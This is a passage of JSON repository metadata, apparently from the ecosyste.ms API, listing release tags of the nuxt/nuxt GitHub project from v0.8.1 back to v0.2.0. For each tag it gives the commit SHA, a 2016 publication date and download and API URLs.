t/nuxt@v0.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1/manifests"},{"name":"v0.8.0","sha":"be5e8c118d1415e33031772daca422a0fae511bf","kind":"commit","published_at":"2016-12-07T18:43:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0/manifests"},{"name":"v0.7.9","sha":"8801327db20c2e5daa594a7d8ad95d7a2a582a14","kind":"commit","published_at":"2016-12-04T18:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9/manifests"},{"name":"v0.7.8","sha":"ddbffcc8af4393e14cc44daa94b4a27a21c6fadf","kind":"commit","published_at":"2016-12-01T18:09:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8/manifests"},{"name":"v0.7.7","sha":"fdc430b23bac4a0cf86b0bc0da7828a573a0176d","kind":"commit","published_at":"2016-11-28T16:28:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7/manifests"},{"name":"v0.7.6","sha":"53499f2a6b0ebf7514f984f6d81ce76ab9aaeb09","kind":"commit","published_at":"2016-11-27T17:46:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6/manifests"},{"name":"v0.7.5","sha":"3ed1340d568c36f65bfe66618f9ac8119e8408de","kind":"commit","published_at":"2016-11-27T17:13:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5/manifests"},{"name":"v0.7.4","sha":"bcf291b54761b64c271573e045e9275f189c3bea","kind":"commit","published_at":"2016-11-25T16:58:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4/manifests"},{"name":"v0.7.3","sha":"cb1994319cd920b77181d852daf79a9c2c51b25c","kind":"commit","published_at":"2016-11-25T14:37:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3/manifests"},{"name":"v0.7.2","sha":"4b9fb87c860f69d4b5044533aee0c16310b10aa1","kind":"commit","published_at":"2016-11-24T13:41:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2/manifests"},{"name":"v0.7.1","sha":"d984c8803d9dd1e58c56a08b97f7d38ba5cb92b7","kind":"commit","published_at":"2016-11-24T12:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1/manifests"},{"name":"v0.7.0","sha":"40515ac91a9e4ae5fd7b4a37c75de2843f6d3fbc","kind":"commit","published_at":"2016-11-24T00:47:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0/manifests"},{"name":"v0.6.9","sha":"5b35834f42aa6cea3724f098787587a86ec6f4c3","kind":"commit","published_at":"2016-11-23T13:05:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9/manifests"},{"name":"v0.6.8","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8/manifests"},{"name":"v0.6.7","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7/manifests"},{"name":"v0.6.6","sha":"fc598ea66e1249645ed3677d8725efc1c048ba2d","kind":"commit","published_at":"2016-11-22T23:27:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6/manifests"},{"name":"v0.6.5","sha":"2400fabceb3b76b756efc8ede2919a4ccb088345","kind":"commit","published_at":"2016-11-21T18:53:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5/manifests"},{"name":"v0.6.0","sha":"edd0227e746c2ecde781915bd8c59e98f399439a","kind":"commit","published_at":"2016-11-21T13:15:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0/manifests"},{"name":"v0.5.3","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3/manifests"},{"name":"v0.5.2","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2/manifests"},{"name":"v0.5.1","sha":"8cbbaeaf838e33bb6e23f06e15724b39042c5206","kind":"commit","published_at":"2016-11-20T10:37:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1/manifests"},{"name":"v0.5.0","sha":"e48f8250a084202fbc492df55f13e3803e2b74cf","kind":"commit","published_at":"2016-11-18T13:45:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0/manifests"},{"name":"v0.4.9","sha":"d4b8bc4f022459c976b41cb9845be38759a0481a","kind":"commit","published_at":"2016-11-18T09:38:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9/manifests"},{"name":"v0.4.8","sha":"d928c9e5970e9d08eec61fe6770325d8c74e6d5b","kind":"commit","published_at":"2016-11-18T08:19:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8/manifests"},{"name":"v0.4.7","sha":"49f67566c2d74a661421be1589279b316dcc9e49","kind":"commit","published_at":"2016-11-17T21:12:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7/manifests"},{"name":"v0.4.6","sha":"06edc8029b796b8008fe52a682159636d10f3e7a","kind":"commit","published_at":"2016-11-17T13:02:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6/manifests"},{"name":"v0.4.4","sha":"2677afb46fc4a950d62f32e6172aeaa2fdcc5a8b","kind":"commit","published_at":"2016-11-17T10:57:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4/manifests"},{"name":"v0.4.3","sha":"a98e6d4e9bda0491bf8f32815701f42f28c793a2","kind":"commit","published_at":"2016-11-16T17:41:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3/manifests"},{"name":"v0.4.2","sha":"d2c0f01593e669147396ff25c4a017372a8390ea","kind":"commit","published_at":"2016-11-16T17:06:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2/manifests"},{"name":"v0.4.1","sha":"b1546682ef7ce3f9ead26f328417d2589875ef46","kind":"commit","published_at":"2016-11-16T16:55:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1/manifests"},{"name":"v0.4.0","sha":"c5c9448a264327adab3920d07937f819f5c0a3c4","kind":"commit","published_at":"2016-11-11T14:30:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0/manifests"},{"name":"v0.3.8","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"5b0ff5617b97d050983358879b6a70835d63be8a","kind":"commit","published_at":"2016-11-10T23:01:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"cb7406cba6a42a4009660569c921f7fdca5bb209","kind":"commit","published_at":"2016-11-10T18:34:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"ea1c5dee15ed92add7e8f69bd523cb090161194e","kind":"commit","published_at":"2016-11-10T16:16:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"9f370cb97c98ff40d4ed5c871147f3c441883b7f","kind":"commit","published_at":"2016-11-10T14:09:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"a8776de913a391bfd825b56cbd5ae655d3490240","kind":"commit","published_at":"2016-11-10T13:46:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"c97c4ec32e0b5a889bd3b95f5f18d251db202354","kind":"commit","published_at":"2016-11-10T02:38:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"d88948bdeac9cd3b8c8f1c1456198e666e49664e","kind":"commit","published_at":"2016-11-10T01:19:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0/manifests"},{"name":"v0.2.6","sha":"18a2b57655a6be21a93949520a663825471fbd48","kind":"commit","published_at":"2016-11-09T22:59:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"a5780a09cae0a0109103bf660da96e479ec5ef73","kind":"commit","published_at":"2016-11-09T14:55:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"73bdfc03943799025def2b91f2402208126da453","kind":"commit","published_at":"2016-11-09T01:35:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"90a97d76ce938be645f82f538a268a83b4c9630d","kind":"commit","published_at":"2016-11-08T02:48:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"923b211a929392e7bb77e3e9326655229397ca13","kind":"commit","published_at":"2016-11-08T00:54:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"876054ed48764ef11278c27d1884d94c3153b05d","kind":"commit","published_at":"2016-11-08T00:18:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"9ebbb14eabd73ed64871d0ee59fafaad914e95f2","kind":"commit","published_at":"2016-11-07T22:26:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/